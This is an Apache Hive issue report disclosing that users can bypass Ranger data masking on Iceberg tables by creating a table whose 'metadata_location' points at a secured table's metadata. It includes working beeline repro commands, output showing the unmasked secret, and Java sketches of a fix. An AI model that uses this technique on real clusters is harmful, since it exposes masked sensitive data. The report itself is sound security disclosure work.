HIVE-27713

Iceberg: metadata location overrides can cause data breach



    Description

      Set to bug/blocker instead of enhancement due to its security-related nature; Hive 4 should not be released without a fix for this. Please reset if needed.

       

      Context: 

      • There are some core tables with sensitive data that users can only query with data masking enforced (e.g. via Ranger). Let's assume this is the `default.icebergsecured` table.
      • An end user can only access the masked form of the sensitive data, as expected.
      • The users also have the privilege to create new tables in their own sandbox databases; let's assume this is the `default.trojanhorse` table for now.
      • The user can create a malicious table that exposes the sensitive data unmasked, leading to a possible data breach.
      • Hive runs with doAs=false so that FGAC can be enforced and end users do not need direct file-system access.

      Repro:

      • First make sure the data is secured by the masking policy:
        <kinit as privileged user>
        beeline -e "
        DROP TABLE IF EXISTS default.icebergsecured PURGE;
        CREATE EXTERNAL TABLE default.icebergsecured (txt string, secret string) STORED BY ICEBERG;
        INSERT INTO default.icebergsecured VALUES ('You might be allowed to see this.','You are NOT allowed to see this!');
        "
        
        <kinit as end user>
        beeline -e "
        SELECT * FROM default.icebergsecured;
        "
        
        +------------------------------------+--------------------------------+
        |         icebergsecured.txt         |     icebergsecured.secret      |
        +------------------------------------+--------------------------------+
        | You might be allowed to see this.  | MASKED BY RANGER FOR SECURITY  |
        +------------------------------------+--------------------------------+
        
      • Now let the user create the malicious table exposing the sensitive data:
        <kinit as end user>
        SECURED_META_LOCATION=$(HADOOP_CLIENT_OPTS="-Djline.terminal=jline.UnsupportedTerminal" beeline -e "DESCRIBE FORMATTED default.icebergsecured;" 2>/dev/null |grep metadata_location  |grep -v previous_metadata_location | awk '{print $5}')
        beeline -e "
        DROP TABLE IF EXISTS default.trojanhorse;
        CREATE EXTERNAL TABLE default.trojanhorse (txt string, secret string) STORED BY ICEBERG
        TBLPROPERTIES (
          'metadata_location'='${SECURED_META_LOCATION}');
        SELECT * FROM default.trojanhorse;
        "
        
        +------------------------------------+-----------------------------------+
        |          trojanhorse.txt           |        trojanhorse.secret         |
        +------------------------------------+-----------------------------------+
        | You might be allowed to see this.  | You are NOT allowed to see this!  |
        +------------------------------------+-----------------------------------+
        

       

      Currently, after HIVE-26707, the RWSTORAGE authorization URI carries either the dummy path or the explicitly set path:

      Permission denied: user [oozie] does not have [RWSTORAGE] privilege on 
      [iceberg://default/trojanhorse?snapshot=%2Fwarehouse%2Ftablespace%2Fexternal%2Fhive%2Ftrojanhorse%2Fmetadata%2Fdummy.metadata.json]
      
      Permission denied: user [oozie] does not have [RWSTORAGE] privilege on 
      [iceberg://default/trojanhorse?snapshot=%2Fwarehouse%2Ftablespace%2Fexternal%2Fhive%2Ficebergsecured%2Fmetadata%2F00001-f4c2a428-30ce-4afd-82ff-d46ecbf02244.metadata.json] 
      

      With a custom location it is not even passed to the authorizer:

      2023-05-17 19:38:51,867 INFO  org.apache.hadoop.hive.ql.Driver: [a49356b4-1b7a-4c9d-9b70-81af12c0465f HiveServer2-Handler-Pool: Thread-253]: Compiling command(queryId=hive_20230517193851_8b9f0ad7-2ae1-4078-b76a-e51c31321b0b): 
      CREATE EXTERNAL TABLE default.policytestth (txt string, secret string) STORED BY ICEBERG 
      TBLPROPERTIES (
        'metadata_location'='hdfs://test.local.host:8020/warehouse/tablespace/external/hive/policytest/metadata/00001-a3e46c1b-318b-4b46-886a-c6ea591f63c1.metadata.json')
      ...
      2023-05-17 19:38:51,898 DEBUG org.apache.iceberg.mr.hive.HiveIcebergStorageHandler: [a49356b4-1b7a-4c9d-9b70-81af12c0465f HiveServer2-Handler-Pool: Thread-253]: 
      Iceberg storage handler authorization URI 
      iceberg://default/policytestth?snapshot=%2Fwarehouse%2Ftablespace%2Fexternal%2Fhive%2Fpolicytestth%2Fmetadata%2Fdummy.metadata.json
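
      For reference, the behavior these log excerpts suggest can be reduced to a small sketch. The class and helper names below (AuthUriTodaySketch, buildAuthURI) are purely illustrative and are not the actual HiveIcebergStorageHandler code; the sketch only mirrors the URI shapes visible above, where the snapshot parameter is either a concrete metadata file or a dummy placeholder under the new table's default location, so a metadata_location override never reaches the authorizer.

      import java.net.URI;
      import java.net.URLEncoder;
      import java.nio.charset.StandardCharsets;

      // Illustrative sketch only - NOT the actual HiveIcebergStorageHandler code.
      public class AuthUriTodaySketch {

        // Hypothetical helper: builds iceberg://<db>/<table>?snapshot=<encoded path>
        static URI buildAuthURI(String db, String table, String defaultTableLocation,
                                String currentMetadataFile) throws Exception {
          String metadataPath = currentMetadataFile != null
              ? currentMetadataFile
              // Fallback seen in the DEBUG log above: a dummy placeholder is used and
              // a metadata_location override in TBLPROPERTIES is never consulted.
              : defaultTableLocation + "/metadata/dummy.metadata.json";
          String encoded = URLEncoder.encode(metadataPath, StandardCharsets.UTF_8);
          return new URI("iceberg://" + db + "/" + table + "?snapshot=" + encoded);
        }

        public static void main(String[] args) throws Exception {
          // A freshly created table has no current metadata file yet, so the URI the
          // authorizer sees points only at the new table's harmless dummy placeholder.
          System.out.println(buildAuthURI("default", "trojanhorse",
              "/warehouse/tablespace/external/hive/trojanhorse", null));
        }
      }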
      

       

      Mandatory changes required for securing tables:

      • The custom metadata location needs to be passed to the authorizer

      Changes required for usability - e.g. to eliminate the need for a separate policy for each table:

      • Default location needs to be calculated based on the warehouse/database default location
      • CREATE/ALTER with the default location should not involve RWSTORAGE authorization, or should be handled in a special way in the authorizer (a rough sketch of the intended URI construction follows below).
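
      Assuming the authorization URI keeps its current iceberg://<db>/<table>?snapshot=<path> shape, the first mandatory change could look roughly like the sketch below. The class and helper names (AuthUriFixSketch, buildAuthURI) are again illustrative and not the actual patch; the point is only that an explicit metadata_location override gets surfaced to the authorizer, so a Ranger RWSTORAGE policy protecting the secured table's metadata path can deny the statement.

      import java.net.URI;
      import java.net.URLEncoder;
      import java.nio.charset.StandardCharsets;
      import java.util.Map;

      // Illustrative sketch of the intended behavior - NOT the actual HIVE-27713 patch.
      public class AuthUriFixSketch {

        // Hypothetical helper: prefer an explicit metadata_location override so the
        // authorizer sees the real target path (e.g. the secured table's metadata
        // file) instead of a dummy placeholder under the new table's location.
        static URI buildAuthURI(String db, String table, String defaultTableLocation,
                                Map<String, String> tblProps) throws Exception {
          String metadataPath = tblProps.get("metadata_location");
          if (metadataPath == null) {
            // Usability goal from the list above: derive the default path from the
            // warehouse/database location so it can be covered by a coarse policy
            // instead of requiring a dedicated policy per table.
            metadataPath = defaultTableLocation + "/metadata/dummy.metadata.json";
          }
          String encoded = URLEncoder.encode(metadataPath, StandardCharsets.UTF_8);
          return new URI("iceberg://" + db + "/" + table + "?snapshot=" + encoded);
        }

        public static void main(String[] args) throws Exception {
          // The trojanhorse CREATE TABLE from the repro would now surface the secured
          // table's metadata file to the authorizer instead of the dummy path.
          Map<String, String> tblProps = Map.of("metadata_location",
              "/warehouse/tablespace/external/hive/icebergsecured/metadata/"
                  + "00001-f4c2a428-30ce-4afd-82ff-d46ecbf02244.metadata.json");
          System.out.println(buildAuthURI("default", "trojanhorse",
              "/warehouse/tablespace/external/hive/trojanhorse", tblProps));
        }
      }

      With this shape, the trojanhorse CREATE from the repro would surface the icebergsecured metadata path to the authorizer, matching the second "Permission denied" example above.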


      People

        Assignee: Ayush Saxena (ayushtkn)
        Reporter: Janos Kovacs (jkovacs@HW)